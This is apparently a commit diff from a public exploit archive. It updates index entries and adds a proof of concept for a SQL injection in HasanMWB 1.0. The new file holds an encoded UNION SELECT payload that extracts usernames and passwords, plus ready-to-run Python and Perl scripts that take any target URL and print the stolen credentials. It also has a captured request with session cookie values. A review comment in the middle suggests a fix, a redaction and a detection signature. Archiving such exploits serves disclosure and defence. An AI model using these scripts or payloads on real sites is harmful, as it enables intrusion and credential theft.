DB: 2018-12-06
2 changes to exploits/shellcodes ImageMagick - Memory Leak Apache Superset 0.23 - Remote Code Execution Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting Apache Superset < 0.23 - Remote Code Execution WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting HasanMWB 1.0 - SQL Injection
parent
60710bbfd9
commit
516678356d
3 changed files with 105 additions and 4 deletions
|
@ -1,4 +1,4 @@
|
|||
# Exploit Title: Apache Superset 0.23 - Remote Code Execution
|
||||
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution
|
||||
# Date: 2018-05-17
|
||||
# Exploit Author: David May (david.may@semanticbits.com)
|
||||
# Vendor Homepage: https://superset.apache.org/
|
||||
|
|
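--- a/exploits/php/webapps/45955.txt
+++ b/exploits/php/webapps/45955.txt
@@ -0,0 +1,100 @@
+# Exploit Title: HasanMWB 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2018-12-05
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://sourceforge.net/projects/hasanmwb/
+# Software Link: https://netcologne.dl.sourceforge.net/project/hasanmwb/HasanMWB-v1.zip
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+#GET /PATH/index.php?hsn=category&id=1%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d HTTP/1.1
+#Host: TARGET
+#User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+#Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+#Accept-Language: en-US,en;q=0.5
+#Accept-Encoding: gzip, deflate
+#Cookie: PHPSESSID=5lk3medj631el6lb4e77ereee5; 786e332ae62061df5c64a17076aef3ee=0li10seku22m9qr31rr8avemn2
+#DNT: 1
+#Connection: keep-alive
+#Upgrade-Insecure-Requests: 1
+#HTTP/1.1 200 OK
+#Date: Wed, 05 Dec 2018 00:24:09 GMT
+#Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+#X-Powered-By: PHP/5.6.30
+#Expires: Thu, 19 Nov 1981 08:52:00 GMT
+#Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+#Pragma: no-cache
+#Content-Length: 2697
+#Keep-Alive: timeout=5, max=100
+#Connection: Keep-Alive
+#Content-Type: text/html; charset=UTF-8
+
+# POC:
+# 1)
+#index.php?hsn=page&id=[SQL] / $id = $_GET['id'];
+#index.php?hsn=category&id=[SQL] / $id = $_GET['id'];
+#index.php?hsn=search&q=[SQL] / $qu = $_GET['q'];
+# Etc..
+
+#!/usr/bin/python
+import urllib2
+import re
+
+print """
+\\\|///
+\\ - - //
+( @ @ )
+----oOOo--(_)-oOOo----
+HasanMWB 1.0 - SQL Injection
+Ihsan Sencan
+---------------Ooooo----
+( )
+ooooO ) /
+( ) (_/
+\ (
+\_)
+"""
+
+s = raw_input("\nTarget:[http://localhost/[PATH]/] ")
+e = ("index.php?hsn=category&id=1")
+p = ("%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d")
+response = urllib2.urlopen(s+e+p)
+c = response.read()
+up = re.findall(r'<h2>(.*)</h2>', c)
+
+print "Server: ", response.info()['server']
+print (up)
+print "Login Url:"+(s)+"panel.php"
+
+
+#!/usr/bin/perl
+sub clear{
+system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
+clear();
+
+print "**************************\n";
+print "HasanMWB 1.0 SQL Injection\n";
+print "Ihsan Sencan\n";
+print "**************************\n";
+
+use LWP::UserAgent;
+print "\nTarget:[http://localhost/[PATH]/] ";
+chomp(my $target=<STDIN>);
+print "\n[!] Exploiting Progress...\n";
+print "\n";
+
+$E="/index.php?hsn=category&id=%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%30%78%33%63%36%38%33%32%33%65%2c%30%78%35%35%37%33%36%35%37%32%33%61%2c%75%73%65%72%6e%61%6d%65%2c%30%78%32%30%32%30%2c%30%78%35%30%36%31%37%33%37%33%33%61%2c%70%61%73%73%77%6f%72%64%2c%30%78%33%63%32%66%36%38%33%32%33%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%75%73%65%72%29%2c%33%2c%34%2d%2d%20%2d";
+$cc = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$cc->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0');
+$host = $target . "".$E."";
+$res = $cc->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content; if ($answer =~/<h2>(.*?)<\/h2>/){
+print "[+] Success !!!\n";
+print "\n[+] Detail : $1\n";
+print "$target/panel.php";
+print "\n";
+}
+else{print "\n[-]Not found.\n";
+}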
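Review bot: The header of this new entry records the injectable parameters (`hsn=page&id`, `hsn=category&id`, `hsn=search&q`, each shown as read straight from `$_GET`) but carries no remediation line, so anyone triaging it has to infer the fix. A header comment such as `# Fix: bind id/q as query parameters (or cast id to an integer) before building the SQL` would close that gap. The captured request also keeps what look like real session cookie values on the `#Cookie:` line; a placeholder such as `#Cookie: PHPSESSID=<redacted>` would be safer in a public archive. For detection, the recorded request line is a usable signature source: a percent-encoded `union select` in the `id` parameter of `index.php`. The file also stores a Python 2 script and a Perl script in one `.txt`, each with its shebang mid-file, so a one-line comment marking where each script starts would help readers.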
|
@ -10126,7 +10126,7 @@ id,file,description,date,author,type,platform,port
|
|||
45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
|
||||
45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
|
||||
45888,exploits/windows_x86/local/45888.py,"HTML Video Player 1.2.5 - Buffer-Overflow (SEH)",2018-11-19,"Kağan Çapar",local,windows_x86,
|
||||
45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,barracud4_,local,multiple,
|
||||
45890,exploits/multiple/local/45890.sh,"ImageMagick - Memory Leak",2018-11-19,ttffdd,local,multiple,
|
||||
45893,exploits/windows/local/45893.txt,"Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation",2018-11-20,"Google Security Research",local,windows,
|
||||
45907,exploits/windows_x86/local/45907.txt,"Arm Whois 3.11 - Buffer Overflow (ASLR)",2018-11-26,zephyr,local,windows_x86,
|
||||
45908,exploits/multiple/local/45908.rb,"Xorg X11 Server - SUID privilege escalation (Metasploit)",2018-11-26,Metasploit,local,multiple,
|
||||
|
@ -40441,8 +40441,8 @@ id,file,description,date,author,type,platform,port
|
|||
45929,exploits/linux/webapps/45929.py,"PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure",2018-12-03,ParagonSec,webapps,linux,80
|
||||
45930,exploits/php/webapps/45930.pl,"Joomla! Component JE Photo Gallery 1.1 - 'categoryid' SQL Injection",2018-12-03,"Ihsan Sencan",webapps,php,80
|
||||
45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80
|
||||
45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
|
||||
45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
|
||||
45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
|
||||
45935,exploits/php/webapps/45935.txt,"WordPress Plugin Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
|
||||
45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
|
||||
45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
|
||||
45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
|
||||
|
@ -40453,3 +40453,4 @@ id,file,description,date,author,type,platform,port
|
|||
45948,exploits/php/webapps/45948.py,"NUUO NVRMini2 3.9.1 - Authenticated Command Injection",2018-12-04,"Artem Metla",webapps,php,443
|
||||
45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
|
||||
45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80
|
||||
45955,exploits/php/webapps/45955.txt,"HasanMWB 1.0 - SQL Injection",2018-12-05,"Ihsan Sencan",webapps,php,80
|
||||
|
|